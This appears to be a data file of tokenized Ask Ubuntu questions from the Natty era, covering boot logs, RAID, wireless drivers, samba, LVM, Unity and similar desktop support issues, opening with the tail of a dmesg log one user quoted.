/sbin/dhclient '' pid=490 comm= '' apparmor_parser '' [ 165.330528 ] type=1400 audit ( 1306246511.884:6 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=490 comm= '' apparmor_parser '' [ 165.331261 ] type=1400 audit ( 1306246511.884:7 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=490 comm= '' apparmor_parser '' [ 165.347775 ] ath9k 0000:07:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 165.347804 ] ath9k 0000:07:00.0 : setting latency timer to 64 [ 165.398272 ] ath : eeprom regdomain : 0x65 [ 165.398278 ] ath : eeprom indicates we should expect a direct regpair map [ 165.398286 ] ath : country alpha2 being used : 00 [ 165.398290 ] ath : regpair used : 0x65 [ 165.398298 ] cfg80211 : updating information on frequency 2412 mhz for a 20 mhz width channel with regulatory rule : [ 165.398306 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 165.398312 ] cfg80211 : updating information on frequency 2417 mhz for a 20 mhz width channel with regulatory rule : [ 165.398319 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 165.398324 ] cfg80211 : updating information on frequency 2422 mhz for a 20 mhz width channel with regulatory rule : [ 165.398331 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 165.398337 ] cfg80211 : updating information on frequency 2427 mhz for a 20 mhz width channel with regulatory rule : [ 165.398344 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 165.398350 ] cfg80211 : updating information on frequency 2432 mhz for a 20 mhz width channel with regulatory rule : [ 165.398357 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 165.398362 ] cfg80211 : updating information on frequency 2437 mhz for a 20 mhz width channel with regulatory rule : [ 165.398369 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 165.398375 ] cfg80211 : updating information on frequency 2442 mhz for a 20 mhz width channel with regulatory rule : [ 165.398382 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 165.398388 ] cfg80211 : updating information on frequency 2447 mhz for a 20 mhz width channel with regulatory rule : [ 165.398395 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 165.398400 ] cfg80211 : updating information on frequency 2452 mhz for a 20 mhz width channel with regulatory rule : [ 165.398407 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 165.398413 ] cfg80211 : updating information on frequency 2457 mhz for a 20 mhz width channel with regulatory rule : [ 165.398420 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 165.398426 ] cfg80211 : updating information on frequency 2462 mhz for a 20 mhz width channel with regulatory rule : [ 165.398433 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 165.398438 ] cfg80211 : updating information on frequency 2467 mhz for a 20 mhz width channel with regulatory rule : [ 165.398445 ] cfg80211 : 2457000 khz - 2482000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 165.398451 ] cfg80211 : updating information on frequency 2472 mhz for a 20 mhz width channel with regulatory rule : [ 165.398458 ] cfg80211 : 2457000 khz - 2482000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 165.398464 ] cfg80211 : disabling freq 2484 mhz as custom regd has no rule that fits a 20 mhz wide channel [ 165.400589 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain [ 165.600141 ] fixme : max pwm is zero . [ 166.305256 ] ieee80211 phy0 : selected rate control algorithm 'ath9k_rate_control' [ 166.307102 ] registered led device : ath9k-phy0 : :radio [ 166.307197 ] registered led device : ath9k-phy0 : :assoc [ 166.307274 ] registered led device : ath9k-phy0 : :tx [ 166.307352 ] registered led device : ath9k-phy0 : :rx [ 166.307379 ] ieee80211 phy0 : atheros ar9285 rev:2 mem=0xf8420000 , irq=17 [ 167.351088 ] hda intel 0000:00:1b.0 : pci int a - > gsi 22 ( level , low ) - > irq 22 [ 167.351198 ] hda intel 0000:00:1b.0 : irq 46 for msi/msi-x [ 167.351258 ] hda intel 0000:00:1b.0 : setting latency timer to 64 [ 168.340294 ] hda_codec : alc272 : bios auto-probing . [ 168.352207 ] input : hda intel mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input7 [ 168.352613 ] input : hda intel headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input8 [ 170.962880 ] type=1400 audit ( 1306246517.516:8 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=727 comm= '' apparmor_parser '' [ 170.963690 ] type=1400 audit ( 1306246517.516:9 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=727 comm= '' apparmor_parser '' [ 170.964540 ] type=1400 audit ( 1306246517.520:10 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=727 comm= '' apparmor_parser '' [ 171.008505 ] type=1400 audit ( 1306246517.564:11 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/share/gdm/guest-session/xsession '' pid=726 comm= '' apparmor_parser '' [ 171.198493 ] type=1400 audit ( 1306246517.752:12 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=734 comm= '' apparmor_parser '' [ 171.199837 ] type=1400 audit ( 1306246517.752:13 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/cupsd '' pid=734 comm= '' apparmor_parser '' [ 171.239142 ] ppdev : user-space parallel port driver [ 171.262460 ] type=1400 audit ( 1306246517.816:14 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/tcpdump '' pid=744 comm= '' apparmor_parser '' [ 171.306533 ] type=1400 audit ( 1306246517.860:15 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/bin/evince '' pid=728 comm= '' apparmor_parser '' [ 171.316601 ] type=1400 audit ( 1306246517.872:16 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/bin/evince-previewer '' pid=728 comm= '' apparmor_parser '' [ 171.323405 ] type=1400 audit ( 1306246517.876:17 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/bin/evince-thumbnailer '' pid=728 comm= '' apparmor_parser '' [ 174.283804 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 174.301000 ] r8169 0000:09:00.0 : eth0 : link down [ 174.301514 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 174.325236 ] bluetooth : l2cap ver 2.15 [ 174.325245 ] bluetooth : l2cap socket layer initialized [ 174.540563 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 174.540573 ] bluetooth : bnep filters : protocol multicast [ 174.924470 ] bluetooth : sco ( voice link ) ver 0.6 [ 174.924479 ] bluetooth : sco socket layer initialized [ 177.636159 ] ext4-fs ( sda5 ) : re-mounted . opts : errors=remount-ro , user_xattr , commit=600 [ 188.127378 ] ext4-fs ( sda5 ) : re-mounted . opts : errors=remount-ro , user_xattr , commit=600 and then here 's after i rebooted it a second time after doing that ( as you can see , the boot time just went right back up ) : ... [ 3.427105 ] sd 4:0:0:0 : attached scsi generic sg1 type 0 [ 3.432917 ] sd 4:0:0:0 : [ sdb ] attached scsi removable disk [ 17.957660 ] ext4-fs ( sda5 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 388.568753 ] adding 3178492k swap on /dev/sda6 . priority : -1 extents:1 across:3178492k [ 388.659406 ] udev [ 269 ] : starting version 167 [ 388.864853 ] ext4-fs ( sda5 ) : re-mounted . opts : errors=remount-ro , user_xattr [ 388.917659 ] lp : driver loaded but no devices found [ 389.899832 ] type=1400 audit ( 1306247595.366:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=415 comm= '' apparmor_parser '' [ 389.922486 ] type=1400 audit ( 1306247595.390:3 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=415 comm= '' apparmor_parser '' [ 389.924183 ] type=1400 audit ( 1306247595.394:4 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=415 comm= '' apparmor_parser '' [ 391.045604 ] [ drm ] initialized drm 1.1.0 20060810 [ 391.147662 ] r8169 0000:09:00.0 : eth0 : link down [ 391.153944 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 391.209670 ] detected toshiba acpi bluetooth device - installing rfkill handler [ 391.229006 ] toshiba_bluetooth : re-enabling toshiba bluetooth [ 391.609521 ] cfg80211 : calling crda to update world regulatory domain [ 392.244187 ] usb 3-1 : new full speed usb device using uhci_hcd and address 2 [ 392.552440 ] linux video capture interface : v2.00 [ 393.252233 ] type=1400 audit ( 1306247598.721:5 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/share/gdm/guest-session/xsession '' pid=610 comm= '' apparmor_parser '' [ 393.262138 ] type=1400 audit ( 1306247598.729:6 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=611 comm= '' apparmor_parser '' [ 393.272282 ] type=1400 audit ( 1306247598.741:7 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=611 comm= '' apparmor_parser '' [ 393.273883 ] type=1400 audit ( 1306247598.741:8 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=611 comm= '' apparmor_parser '' [ 393.389565 ] type=1400 audit ( 1306247598.857:9 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=616 comm= '' apparmor_parser '' [ 393.411543 ] type=1400 audit ( 1306247598.877:10 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/cupsd '' pid=616 comm= '' apparmor_parser '' [ 393.453436 ] type=1400 audit ( 1306247598.921:11 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/bin/evince '' pid=613 comm= '' apparmor_parser '' [ 393.506025 ] synaptics touchpad , model : 1 , fw : 7.2 , id : 0x1c0b1 , caps : 0xd04733/0xa40000/0xa0000 [ 393.609028 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input4 [ 393.985506 ] uvcvideo : found uvc 1.00 device usb 2.0 camera ( 064e : c211 ) [ 394.024541 ] input : usb 2.0 camera as /devices/pci0000:00/0000:00:1d.7/usb1/1-8/1-8:1.0/input/input5 [ 394.025683 ] usbcore : registered new interface driver uvcvideo [ 394.025709 ] usb video class driver ( v1.0.0 ) [ 394.882850 ] cfg80211 : world regulatory domain updated : [ 394.882878 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 394.882906 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 394.882916 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 394.882943 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 394.882970 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 394.882979 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 395.000854 ] i915 0000:00:02.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 395.000886 ] i915 0000:00:02.0 : setting latency timer to 64 [ 395.067278 ] bluetooth : core ver 2.15 [ 395.067404 ] net : registered protocol family 31 [ 395.067428 ] bluetooth : hci device and connection manager initialized [ 395.067435 ] bluetooth : hci socket layer initialized [ 395.183370 ] bluetooth : generic bluetooth usb driver ver 0.6 [ 395.300262 ] usbcore : registered new interface driver btusb [ 395.302270 ] i915 0000:00:02.0 : irq 45 for msi/msi-x [ 395.302301 ] [ drm ] supports vblank timestamp caching rev 1 ( 10.10.2010 ) . [ 395.302308 ] [ drm ] driver supports precise vblank timestamp query . [ 395.489428 ] vgaarb : device changed decodes : pci:0000:00:02.0 , olddecodes=io+mem , decodes=io+mem : owns=io+mem [ 395.491182 ] [ drm ] initialized overlay support [ 395.582498 ] bluetooth : l2cap ver 2.15 [ 395.582507 ] bluetooth : l2cap socket layer initialized [ 395.679172 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 395.679181 ] bluetooth : bnep filters : protocol multicast [ 395.742794 ] bluetooth : sco ( voice link ) ver 0.6 [ 395.742822 ] bluetooth : sco socket layer initialized [ 395.840388 ] console : switching to colour frame buffer device 128x37 [ 395.840572 ] fb0 : inteldrmfb frame buffer device [ 395.840579 ] drm : registered panic notifier [ 395.879248 ] acpi device:01 : registered as cooling_device2 [ 395.888738 ] input : video bus as /devices/lnxsystm:00/device:00/pnp0a08:00/lnxvideo:00/input/input6 [ 395.896534 ] acpi : video device [ igd0 ] ( multi-head : yes rom : no post : no ) [ 395.902673 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 396.096476 ] fixme : max pwm is zero . [ 396.431899 ] ath9k 0000:07:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 396.431964 ] ath9k 0000:07:00.0 : setting latency timer to 64 [ 396.498724 ] ath : eeprom regdomain : 0x65 [ 396.498752 ] ath : eeprom indicates we should expect a direct regpair map [ 396.498780 ] ath : country alpha2 being used : 00 [ 396.498787 ] ath : regpair used : 0x65 [ 396.498815 ] cfg80211 : updating information on frequency 2412 mhz for a 20 mhz width channel with regulatory rule : [ 396.498844 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 396.498853 ] cfg80211 : updating information on frequency 2417 mhz for a 20 mhz width channel with regulatory rule : [ 396.498882 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 396.498908 ] cfg80211 : updating information on frequency 2422 mhz for a 20 mhz width channel with regulatory rule : [ 396.498919 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 396.498946 ] cfg80211 : updating information on frequency 2427 mhz for a 20 mhz width channel with regulatory rule : [ 396.498974 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 396.498983 ] cfg80211 : updating information on frequency 2432 mhz for a 20 mhz width channel with regulatory rule : [ 396.499011 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 396.499037 ] cfg80211 : updating information on frequency 2437 mhz for a 20 mhz width channel with regulatory rule : [ 396.499066 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 396.499074 ] cfg80211 : updating information on frequency 2442 mhz for a 20 mhz width channel with regulatory rule : [ 396.499102 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 396.499129 ] cfg80211 : updating information on frequency 2447 mhz for a 20 mhz width channel with regulatory rule : [ 396.499139 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 396.499166 ] cfg80211 : updating information on frequency 2452 mhz for a 20 mhz width channel with regulatory rule : [ 396.499193 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 396.499202 ] cfg80211 : updating information on frequency 2457 mhz for a 20 mhz width channel with regulatory rule : [ 396.499230 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 396.499257 ] cfg80211 : updating information on frequency 2462 mhz for a 20 mhz width channel with regulatory rule : [ 396.499268 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 396.499294 ] cfg80211 : updating information on frequency 2467 mhz for a 20 mhz width channel with regulatory rule : [ 396.499322 ] cfg80211 : 2457000 khz - 2482000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 396.499331 ] cfg80211 : updating information on frequency 2472 mhz for a 20 mhz width channel with regulatory rule : [ 396.499360 ] cfg80211 : 2457000 khz - 2482000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 396.499386 ] cfg80211 : disabling freq 2484 mhz as custom regd has no rule that fits a 20 mhz wide channel [ 396.512544 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain [ 396.608368 ] ieee80211 phy0 : selected rate control algorithm 'ath9k_rate_control' [ 396.629603 ] registered led device : ath9k-phy0 : :radio [ 396.630182 ] registered led device : ath9k-phy0 : :assoc [ 396.633716 ] registered led device : ath9k-phy0 : :tx [ 396.634392 ] registered led device : ath9k-phy0 : :rx [ 396.634453 ] ieee80211 phy0 : atheros ar9285 rev:2 mem=0xf8560000 , irq=17 [ 397.011196 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 397.051152 ] hda intel 0000:00:1b.0 : pci int a - > gsi 22 ( level , low ) - > irq 22 [ 397.051404 ] hda intel 0000:00:1b.0 : irq 46 for msi/msi-x [ 397.051534 ] hda intel 0000:00:1b.0 : setting latency timer to 64 [ 397.289225 ] hda_codec : alc272 : bios auto-probing . [ 398.319815 ] input : hda intel mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input7 [ 398.321761 ] input : hda intel headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input8 [ 399.041180 ] ppdev : user-space parallel port driver [ 399.145577 ] audit_printk_skb : 9 callbacks suppressed [ 399.145586 ] type=1400 audit ( 1306247604.613:15 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=973 comm= '' apparmor_parser '' [ 399.148806 ] type=1400 audit ( 1306247604.617:16 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/cupsd '' pid=973 comm= '' apparmor_parser '' [ 401.088833 ] ext4-fs ( sda5 ) : re-mounted . opts : errors=remount-ro , user_xattr , commit=600 [ 406.550680 ] ext4-fs ( sda5 ) : re-mounted . opts : errors=remount-ro , user_xattr , commit=600 sadly , reinstalling ureadahead has not decreased the time .
44213	strange file exist with name '* ( star , asterisk ) '	what is this strange file with name '*' i can not even guess.. $ ll total 549m -rw-r -- -- - 1 jaewan eng 0 apr 29 18:37 * drwxr-x -- - 21 jaewan eng 4.0k may 20 08:21 ./ drwx -- -- -- 19 jaewan eng 4.0k may 4 18:09 ../ drwxr-x -- - 6 jaewan eng 4.0k apr 13 23:00 .repo/ can i delete this file ?
44216	why do my applets randomly crash ?	ever since my upgrade to natty narwhal , applets ( e.g , clock , weather indicator , indicator applet . ) will crash the second i reach the desktop after logging into ubuntu classic . which one is rather random , but it 's always at least one or more of those . is this a known bug , or is there something wrong with my system ?
44217	frustrated with ubuntu and softwareraid 5	i 'm a complete newbie to ubuntu , but so far , i 've had no luck installing a software raid5 with ubuntu . i 've already installed ubuntu server 11.04 about 3 times . i followed the software raid instructions here to the best of my abilities , even though the screens are different . i did not use a raid 1 for my boot partition on each drive ... is that a must ? anyway , i 've had errors in past installations , but i was able to get through the entire install with 3 drives , a small bootable partition on each ( sda/b/c1 ? ) , a swap partition on each ( sda/b/c3 ) , and then a large partition mounted to / for my raid 5 ( sda/b/c2 ) . the final install step looks like everything works correctly because ubuntu says it is installing grub to /dev/sda1 through /dev/sdc1 , but then when i try to boot for the first time , it immediately says `` error : no such disk grub recovery > '' . i was able to login using livecd and try to get grub loaded , but i have n't had any luck there as well . if i apt-get grub and run it and issue find /boot/grub/stage1 , it says nothing is found . what am i doing wrong , how do i get to a working raid5 ?
44218	how can i direct a pipe input to ls command ?	when i type sth . like that find . -name *foo* | ls -lah it gives me a ls-output of 'pwd ' like i had no file ( s ) given to 'ls ' . to simply use ls -lah $ ( find . -name *foo* ) works well ( when the 'find ' command has results ) . is it possible to pipe to 'ls ' ?
44221	how to get wireless working with ubuntu 11 server ?	when i install ubuntu desktop , i can use internet once i boot into ubuntu , but with server edition , i ca n't . somehow , wireless is not detected ... how can i install it either during install or post install . suppose throughout the whole process , all i have is wireless . so either i dl files using desktop version then install ubuntu server or something
44226	mounting /dev/sdd1 fails : according to mtab , /dev/sdd1 is already mounted	trying to mount drive but get an error error mounting : mount exited with exit code 1 : helper failed with : mount : according to mtab , /dev/sdd1 is already mounted on / mount failed according to 'help answers i need to edit fstab mtab but where are these files located ? are not under etc unless 'hidden ' ? am novice to ubuntu ...
44227	removing gnome3-session properly	i attempted to install gnome3 in my ubuntu 11 and got busted . and i reinstalled ubuntu and attempted again to install gnome3 . now when i installed the gnome3-session , weird things are happening - no packages are able to install - the error : ( when i issued `` sudo apt-get install openssh-server '' ) the following packages have unmet dependencies : gnome-session : depends : gnome-session-bin ( < 2.33 ) but 3.0.1-0ubuntu1~build2 is to be installed depends : gnome-session-common ( = 2.32.1-0ubuntu20 ) but 3.0.1-0ubuntu1~build2 is to be installed ubuntu software center is asking to repair the repository so i 've the fear , that if i log out , i may not be able to log-in again ( which happened earlier ) how to remove / fix this condition ?
44235	disable joining multiple windows to one icon in unity panel	i do n't want multiple open windows of the same program to be joined in one icon . how can i disable that to get one icon per window ?
44236	are there any easy to use image editing programs ?	i want to crop , maybie highlight some of the picture and be able to save in jpg . i want a program that is easy to use . i tried gimp but it was way hard to use . my question is are there any easy to use image editing programs . i dont want a ubuntu replica of the windows paint . or something that looks like it came from windows . or something that is made for kids . i want a real program !
44242	wanting to understand lvm & the default setup	from what i understand lvm allows me to resized and moved around almost at will ~ from here then i thought , with the usual partitions , i can also resize them ? perhaps with lvm i can have 1 logical volume span multiple disks ? also the default lvm setup in ubuntu is abit confusing ... whats the 255mb ext2 parition for ? should n't ext4 be better ? looks awefully similar to those oem partitions on windows ... why is there 4mb wasted ... how do i determine how much space i should allocate to swap . i read previously for windows that if i have enough ram , i should have low/no swap space to force os to use faster ram ? true ? why does ubuntu split the same hdd into 2 different views ? why do i get such a different picture in gparted ? no swap here ? then now , if i want to add a partition , i should shrink sda5 then add one ? since its the os partition i cant do that when booted i guess ?
44244	password timeout for synaptic	i am using natty with classic screen ( gnome2 , not unity ) . i have noticed that closing and reopening synaptic requires retyping admin password . back in maverick days password would n't timeout instantly after closing synaptic . is it possible to bring back the old behavior . thank you .
44247	files are read-only after copying over samba	i used to copy files from one system to another system via samba . how ever i am getting the file only in read only mode . what i am doing now is i used to change the file permission after transferring the file . it seems to be little time consuming one . is there any permanent solution to this problem ? still i have the same problem . pls have a look @ my samba setup . http : //paste.ubuntu.com/614067/ output : karthick @ karthick : ~ $ groups karthick adm dialout cdrom plugdev lpadmin admin sambashare
44251	how do i install libreoffice 3.4 ?	i read that it has better gtk+ integration , is faster and java has been minimized . so i wanted to try it . how do i install it ? a ppa would be preferable .
44256	application shortcuts in home folder for message-menu	i like other applications in my message-menu ( e.g . thunderbird , xchat , skype ) , so i have created hortcuts for those applications in folder /usr/share/indicators/messages/applications . to avoid restoring those shortcuts after every fresh install of ubuntu , i would like to know if there is a user-related path inside the home folder where to move them ( like the application folders for the gnome menu items ) . i keep my home folder into a separate partition , so i do n't have to restore my settings after every installations . e.g . : you can customize for instance your menu settings using home folder ~/.local/share/applications . launchers in this folder will override the ones in root folder /usr/share/applications , plus they will be kept after a fresh install if your home is in a separate partition or if you back it up .
44258	how to dual boot ubuntu along with another linux distribution ?	what is the correct/best way of dual booting another linux distribution ( say , fedora 14 ) along with ubuntu 11.04 ? is sharing the /home partition with both distros is a good idea ? what are the pitfalls i have to be aware of ?
44260	mouse/gesture control with kinect ?	i 'm lazy and i know it ... but i am looking for either a debian package or a set of terminal commands that will : download kinect drivers enable me to control the mouse with kinect is there any one out there that knows if this has been done or can do it ?
44267	how can i have 2 rows and 3 columns of desktops/workpaces in lubuntu ?	how can i have 2 rows and 3 columns of desktops in lubuntu ? ( instead of having 1 row which is the default setting . ) i have n't found a setting , yet .
44268	transmission causes internet to stop working - log off required to make it work again	after some time of downloading torrents via transmission the internet connection stops working , causing both torrents and sites to not load . this only happens on my machine ( meaning other computers/tablets/smartphones in the house can browse just fine ) and internet comes back exactly after i log out . what is a little strange , as well , is that network manager shows that i am connected - i can also access the router 's page at the time i am `` offline '' using utorrent to download torrents from windows 7 does n't cause the same problem - neither using transmission on another ubuntu system running in the same network i am connected using wi-fi , if that matters at all
44276	ignore `` bad : new and old password are too similar ''	i receive this message when trying to change my password : '' bad : new and old password are too similar '' the passwords ' `` similarity '' is irrelevant for my needs , so i 'd like to bypass this . i tried sudo passwd $ my_username i thought this had worked because i got a message : passwd : password updated successfully however , the password change has no effect after leaving the terminal , and my old password is still the only one recognized . any ideas ? thanks
44278	is there a covergloobus-like plasma widget ?	i 'm using the kde plasma desktop within unity . i 'm really missing covergloobus though . is there a plasmoid that can show cover art from banshee ? i 've tried several including 'current song ' but they only seem to work with amarok : s even better would be getting covergloobus to show on the plasma desktop.. any help would be appreciated .
44280	locked/stuck up screensaver after monitor turns off	since i started using natty i experience a strange situation at times . when i leave my system idle for 30+ mins. , the screensaver ant spotlight remains active for specified time , then the monitor turns off after a while . later when i am back to work on moving mouse/pressing keys on keyboard monitor powers on but i am greeted with a stuck up ant in the screen . i wo n't be able to access open applications in any way . no key/mouse click works . i tried going to terminal with ctrl+alt+f1 and killing gnome-screensav but the ant does n't budge . only way out i take is to log out with ctrl+alt+backspace which works causing to lose my unsaved work .
44281	slow wireless internet on an intel 4965 , how do i upgrade the driver ?	i am on intel wireless 4965 with slow internet ... i tried disabling ipv6 didnt do anything significant . i am wondering how can i update my wireless drivers to those on here . i get a .ucode file . after some searching , i find that i should put it in /lib/firmware then run sudo modprobe iwl4965 ? something like that ? i get no errors nor success messages . how can i verify i am using that driver ? i also noticed that if i do jiewmeng @ jiewmeng : ~ $ sudo modprobe iwl < tab > < tab > iwl3945 iwlagn iwlcore no iwl4945 there ?
44286	busybox error on boot	i 've windows xp and ubuntu 10.10 dual boot was working fine then suddenly while booting in grub if i select ubuntu it shows me stupid busybox error same as this and windows xp is working fine the following image i got from google search but the same error i 'm getting
44290	how to hide skype icon from notification area ?	i am running ubuntu 10.10 with gnome 2.32.0 . i ca n't find anywhere how to remove an icon from my notification applet on gnome panel . i would like to hide the skype icon but still have skype running . i know that sometimes it dissapears but it is a result of a glitch . i would like to hide the skype one icon from the notification area . how can i do this ?
44292	how do i fix the 1908 virtualbox error ?	i have the following error : kernel driver not installed ( rc=-1908 ) please install the virtualbox-ose-dkms package and execute 'modprobe vboxdrv ' as root . this forbids me to launch any virtual machine . i checked and i already have the virtualbox-ose-dkms package installed . as a matter of fact i reinstalled it too , but it did not solve the problem .
44297	is there anyone running his/her own instance of launchpad ?	i would like to know if there is anyone that successfully installed a production launchpad instance , one that it actively used - other than the launchpad.net one . related to http : //stackoverflow.com/questions/5420774/does-anyone-have-experience-with-a-private-launchpad-instance
44300	printers compatible with ubuntu also compatible with crunchbang ?	would printers that are rated compatible with ubuntu also be compatible with crunchbang ?
44304	screen completely screwed up when in dual screen in unity	ok , i read unity has problems when in dual screen mode , but this seems something different from the bug i read filed . as soon as i attach the secondary screen i get both screens completely screwed up like the image attached . here something about the desktop can be seen , some other times only lines could be seen . i 'm using ati with opensource drivers and kernel 2.6.39 ( 2.6.38 was n't working and 2.6.35 was doing the same ) . do not suggest please to install proprietary ati drivers cause on 11.04 those wo n't install . still investigating why , in case i 'll ask another separate question : - ) anyone else experiencing the same ? have you ever encountered a similar bugreport ? should i report this ? thanks !
44305	contacts syncing on sony ericsson c510 , connection terminated	i have a sony ericsson phone , the c510 . i use ubuntu one 's syncml server to synchronize my contacts list . this setup worked fine up until a month or two ago . now , every time the phone tries to sync or i manually ask it to , it says something about connection terminated . when i try to browse to http : //syncml.one.ubuntu.com , i can reach the server but my phone asks for a confirmation to continue browsing on an untrusted site . could this be part of the problem ? thank you .
44310	change applications displayed on dash 's home ?	is there a way to change the applications in the dash home ? i 'm not sure its called that , but i 'm referring to what you get when you press the super button . also , i know that four applications are allowed , but i 'm wondering if you can add more , because i have lots of screen space .
44317	ca n't install openoffice : package dependencies can not be resolved	i dont remember what happened to my ooo but when i wanted to reinstall it i got an error ! can someone help me to resolve this error ?
44321	how to customize indicator-datetime to two line configuration ?	before we used to be able to customize the gnome panel clock to two line style . how could we do the same for indicator-datetime ? i understand there 's dconf-editor from dconf-tools . and by going to com.canonical.datetime it almost looks like the gconf-editor thing . but entering < sup > < span rise= '' 3000 '' font_desc= '' ubuntu 7.5 '' color= '' # dfd8c8 '' weight= '' normal '' > % a % d % b < /span > < /sup > % n < sub > < span font_desc= '' ubuntu 7.5 '' color= '' # dfd8c8 '' weight= '' bold '' > % i : % m % p < /span > < /sub > like before did not change a thing . also , just by changing clock by removing the date leaves huge empty spaces around the time , instead of creating more space . it look horrible ... how can i fix it ? edit : the extra spacing will only be fixed after log out . maybe it will work by killing gnome-panel , but i did n't try that .
44324	is it possible to play fable 3 through wine ?	fable 3 for pc just came out this week , and i got the game but i am too lazy to reinstall windows , so i am just wondering if is possible to play fable 3 through wine in ubuntu ? by the way , my ubuntu is 11.04 and wine version is 1.2.2
